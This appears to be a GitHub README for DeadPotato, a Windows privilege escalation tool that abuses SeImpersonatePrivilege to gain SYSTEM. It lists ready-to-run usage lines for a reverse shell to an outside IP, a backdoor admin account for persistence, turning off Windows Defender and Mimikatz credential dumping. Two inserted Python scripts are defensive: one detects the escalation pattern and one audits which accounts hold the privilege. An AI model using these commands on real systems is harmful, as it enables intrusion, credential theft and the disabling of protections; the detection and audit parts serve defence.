forked from lypd0/DeadPotato

DeadPotato is a windows privilege escalation utility from the Potato family of exploits, leveraging the SeImpersonate right to obtain SYSTEM privileges. This script has been customized from the original GodPotato source code by BeichenDream.


offsoc/DeadPotato


🚨 Hashdump & SharpHound Modules Now Available! 🚨

❗ Usage of this program under an unauthorized context is strictly forbidden. The author(s) of DeadPotato do not take any responsibility for any harm caused to systems. Use with caution. ❗

C:\Users\lypd0> GodPotato.exe
  
    ⠀⢀⣠⣤⣤⣄⡀⠀    _           _
    ⣴⣿⣿⣿⣿⣿⣿⣦   | \ _  _  _||_) _ _|_ _ _|_ _
    ⣿⣿⣿⣿⣿⣿⣿⣿   |_/(/_(_|(_||  (_) |_(_| |_(_)
    ⣇⠈⠉⡿⢿⠉⠁⢸   Open Source @ github.com/lypd0
    ⠙⠛⢻⣷⣾⡟⠛⠋         -= Version: 1.2 =-
        ⠈⠁⠀⠀⠀

_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

 (*) Example Usage(s):

   -={ deadpotato.exe -MODULE [ARGUMENTS] }=-

   -> deadpotato.exe -cmd "whoami"
   -> deadpotato.exe -rev 192.168.10.30:9001
   -> deadpotato.exe -exe paylod.exe
   -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1
   -> deadpotato.exe -shell
   -> deadpotato.exe -mimi sam
   -> deadpotato.exe -defender off
   -> deadpotato.exe -sharphound

 (*) Available Modules:

   - cmd: Execute a command as NT AUTHORITY\SYSTEM.
   - rev: Attempts to establish a reverse shell connection to the provided host
   - exe: Execute a program with NT AUTHORITY\SYSTEM privileges (Does not support interactivity).
   - newadmin: Create a new administrator user on the local system.
   - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!)
   - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!)
   - defender: Either enables or disables Windows Defender's real-time protection.
   - sharphound: Attempts to collect domain data for BloodHound.

❔ Quick Start - How To Use

Is the SeImpersonatePrivilege right enabled in your context? If so, DeadPotato can be used to obtain maximum privileges on the local system.

The tool attempts to start an elevated process running in the context of the NT AUTHORITY\SYSTEM user by abusing a flaw in how DCOM's RPCSS service handles OXIDs, giving unrestricted access to the machine so that critical operations can be performed freely.

⚠️ In the example below, the -cmd module is used. Many other modules are available, such as -rev IP:PORT to spawn an elevated reverse shell, -newadmin usr:pass to create a new local Administrator user for persistence, or -mimi sam to dump SAM hashes.
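From the defender's side, the mechanism described above leaves a recognisable trace: the elevated process is created from inside the low-privileged process that held the impersonation token, so a child running as NT AUTHORITY\SYSTEM whose parent runs as some other account (a service or application-pool identity) is the thing to look for. The following detection heuristic is an added example and is not part of the DeadPotato or GodPotato code; it runs over constructed process-creation records shaped like Sysmon Event ID 1, and the field names used (Image, User, ParentImage, ParentUser, ProcessId, CommandLine) are an assumption about the collector in use.

```python
"""Flag SYSTEM processes created by a non-SYSTEM parent (Potato-family
escalation pattern). Added example; records below are constructed and
the Sysmon-style field names are assumed."""

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"

# Parent images (lower-cased full paths) that legitimately spawn SYSTEM
# children from a non-SYSTEM context in a given environment. Empty by
# default; tune per host to suppress known-good activity.
DEFAULT_ALLOWED_PARENTS = frozenset()

# Constructed sample telemetry (not real log data).
SAMPLE_EVENTS = [
    # Normal: Service Control Manager (SYSTEM) starts a service host.
    {"ProcessId": 1204, "Image": r"C:\Windows\System32\svchost.exe",
     "User": SYSTEM_USER, "ParentImage": r"C:\Windows\System32\services.exe",
     "ParentUser": SYSTEM_USER, "CommandLine": "svchost.exe -k netsvcs"},
    # Normal: IIS worker process started under an app-pool identity.
    {"ProcessId": 3120, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "User": r"IIS APPPOOL\DefaultAppPool",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "ParentUser": SYSTEM_USER, "CommandLine": "w3wp.exe -ap DefaultAppPool"},
    # Suspicious: SYSTEM child whose parent runs as the app-pool identity.
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\cmd.exe",
     "User": SYSTEM_USER, "ParentImage": r"C:\Users\Public\dp.exe",
     "ParentUser": r"IIS APPPOOL\DefaultAppPool",
     "CommandLine": "cmd.exe /c whoami"},
    # Older collector without ParentUser: cannot be evaluated, not flagged.
    {"ProcessId": 5001, "Image": r"C:\Windows\System32\conhost.exe",
     "User": SYSTEM_USER, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "conhost.exe"},
]


def is_system_spawn_from_low_priv(event, allowed_parents=DEFAULT_ALLOWED_PARENTS):
    """True when a SYSTEM process was created by a parent that is not SYSTEM."""
    if event.get("User", "").upper() != SYSTEM_USER.upper():
        return False
    parent_user = event.get("ParentUser")
    if not parent_user:
        # No parent identity recorded: the heuristic cannot decide, so do not flag.
        return False
    if parent_user.upper() == SYSTEM_USER.upper():
        return False
    if event.get("ParentImage", "").lower() in allowed_parents:
        return False
    return True


def find_suspicious_system_spawns(events, allowed_parents=DEFAULT_ALLOWED_PARENTS):
    """Return one finding per event that matches the escalation pattern."""
    findings = []
    for ev in events:
        if is_system_spawn_from_low_priv(ev, allowed_parents):
            findings.append({
                "pid": ev.get("ProcessId"),
                "image": ev.get("Image"),
                "command_line": ev.get("CommandLine"),
                "parent_image": ev.get("ParentImage"),
                "parent_user": ev.get("ParentUser"),
                "reason": "SYSTEM process created by a parent running as "
                          + repr(ev.get("ParentUser")),
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_system_spawns(SAMPLE_EVENTS):
        print(f"[!] pid={f['pid']} {f['image']} <- {f['parent_image']} "
              f"({f['parent_user']}): {f['reason']}")
```

The allowlist exists because a few environments do have legitimate SYSTEM children of non-SYSTEM parents; start empty, review the hits for a week, then add only full image paths you have verified. Events without a recorded parent identity are deliberately left unflagged rather than guessed at, so pair this with a collector that populates ParentUser.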

(screenshot: the -cmd module in use)

Verify SeImpersonatePrivilege rights

In order to use DeadPotato, the SeImpersonatePrivilege right must be enabled in the current context. To verify this, run the whoami /priv command. If the privilege is disabled, exploitation is not possible in the current context.

C:\Users\lypd0> whoami /priv

<...SNIP...>
SeImpersonatePrivilege    Impersonate a client after authentication     Enabled
<...SNIP...>
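The whoami /priv check above tells you about one token. For an administrator reviewing a host, the more useful question is which accounts hold SeImpersonatePrivilege at all, since each one is a potential starting point for this class of escalation if compromised. The script below is an added example, not part of the DeadPotato project: it parses the text that whoami /priv prints (the same layout as the snippet above) and the INF produced by `secedit /export /cfg <file>`, whose `[Privilege Rights]` section lists each right as `Name = *SID,*SID,...` (that layout, and the set of default holders, are assumptions made here). Both sample inputs are constructed.

```python
"""Audit SeImpersonatePrivilege: parse `whoami /priv` output and a
`secedit /export` INF to list non-default holders. Added example; sample
inputs are constructed and the INF layout is assumed."""

import re

# Principals that hold the right on a default installation (assumed):
# Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE.
DEFAULT_HOLDERS = {"S-1-5-32-544", "S-1-5-6", "S-1-5-19", "S-1-5-20"}

# Constructed `secedit /export /cfg` excerpt; the S-1-5-21-... SID stands
# for a custom local service account and is not a real identifier.
SECEDIT_SAMPLE = """[Unicode]
Unicode=yes
[Privilege Rights]
SeDebugPrivilege = *S-1-5-32-544
SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20,*S-1-5-21-1111-2222-3333-1105
SeServiceLogonRight = *S-1-5-21-1111-2222-3333-1105
[Version]
signature="$CHICAGO$"
Revision=1
"""

# Constructed `whoami /priv` output in the standard column layout.
WHOAMI_SAMPLE = """PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_privilege_rights(inf_text):
    """Return {right_name: set_of_sids} from the [Privilege Rights] section."""
    rights = {}
    in_section = False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[privilege rights]"
            continue
        if not in_section or "=" not in line:
            continue
        name, _, value = line.partition("=")
        # Each SID is written as *S-1-...; strip the leading asterisk.
        sids = {tok.strip().lstrip("*") for tok in value.split(",") if tok.strip()}
        rights[name.strip()] = sids
    return rights


def non_default_impersonators(inf_text):
    """SIDs holding SeImpersonatePrivilege beyond the built-in defaults."""
    holders = parse_privilege_rights(inf_text).get("SeImpersonatePrivilege", set())
    return sorted(holders - DEFAULT_HOLDERS)


def privilege_state(whoami_text, privilege="SeImpersonatePrivilege"):
    """'Enabled', 'Disabled', or None if the token does not hold the right."""
    for line in whoami_text.splitlines():
        m = re.match(r"^(\S+)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m and m.group(1) == privilege:
            return m.group(2)
    return None


if __name__ == "__main__":
    print("current token:", privilege_state(WHOAMI_SAMPLE))
    print("non-default holders:", non_default_impersonators(SECEDIT_SAMPLE))
```

Every SID the second function reports is a service or application account that would satisfy the precondition described above if an attacker gained code execution as it; resolve each SID to an account name and confirm the service genuinely needs to impersonate clients, otherwise run it under an identity without the right.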

🐚 Getting an Elevated Reverse Shell

(screenshot: an elevated reverse shell obtained with the -rev module)

🏅 Credits

This project, "DeadPotato", is a tool built on the source code of the masterpiece "GodPotato" by BeichenDream. If you like this project, make sure to also show support for the original project:

BeichenDream, Benjamin DELPY gentilkiwi, BloodHound Developers.

License

This project is licensed under the Apache 2.0 License. Please review the LICENSE file for more details.


Languages

  • C# 100.0%